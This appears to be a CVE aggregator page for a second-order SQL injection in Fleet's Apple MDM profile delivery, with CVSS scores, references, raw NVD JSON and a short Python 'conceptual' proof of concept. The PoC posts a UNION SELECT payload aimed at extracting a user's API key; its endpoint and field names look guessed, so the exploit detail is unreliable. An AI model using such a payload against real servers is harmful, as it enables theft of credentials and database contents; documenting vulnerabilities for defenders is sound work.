CVE-2026-34385

Description

Fleet is open source device management software. Prior to 4.81.0, a second-order SQL injection vulnerability in Fleet's Apple MDM profile delivery pipeline could allow an attacker with a valid MDM enrollment certificate to exfiltrate or modify the contents of the Fleet database, including user credentials, API tokens, and device enrollment secrets. Version 4.81.0 patches the issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE

Fleet < 4.81.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-34385 (Fleet Second-Order SQL Injection)
# This is a conceptual demonstration.

import requests

target_url = "https://fleet-server.example.com"
mdm_endpoint = "/api/v1/fleet/mdm/profile"
valid_mdm_cert = "/path/to/valid/cert.pem"
valid_mdm_key = "/path/to/valid/key.pem"

# The payload attempts to extract the API token of the first user
# This payload is stored in the DB first
malicious_payload = "test' UNION SELECT api_key FROM users LIMIT 1-- -"

headers = {
    "Content-Type": "application/json"
}

data = {
    "profile_data": malicious_payload,
    "device_identifier": "TestDevice"
}

# Step 1: Send the payload using the valid MDM certificate
# The server accepts this and stores it in the database
response = requests.post(
    target_url + mdm_endpoint,
    cert=(valid_mdm_cert, valid_mdm_key),
    json=data,
    headers=headers,
    verify=False
)

if response.status_code == 200:
    print("[+] Payload stored successfully. Waiting for background job trigger...")
    print("[+] Once the background process consumes the data, the SQL injection will execute.")
else:
    print("[-] Failed to deliver payload")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34385
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34385
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34385/
[4] VulDB https://vuldb.com/cve/CVE-2026-34385
[5] https://github.com/fleetdm/fleet/security/advisories/GHSA-v895-833r-8c45

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34385", "sourceIdentifier": "[email protected]", "published": "2026-03-27T19:16:43.270", "lastModified": "2026-04-07T21:15:47.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fleet is open source device management software. Prior to 4.81.0, a second-order SQL injection vulnerability in Fleet's Apple MDM profile delivery pipeline could allow an attacker with a valid MDM enrollment certificate to exfiltrate or modify the contents of the Fleet database, including user credentials, API tokens, and device enrollment secrets. Version 4.81.0 patches the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.81.0", "matchCriteriaId": "84AB2C74-C556-4B42-9A54-A5B201D1BDC3"}]}]}], "references": [{"url": "https://github.com/fleetdm/fleet/security/advisories/GHSA-v895-833r-8c45", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}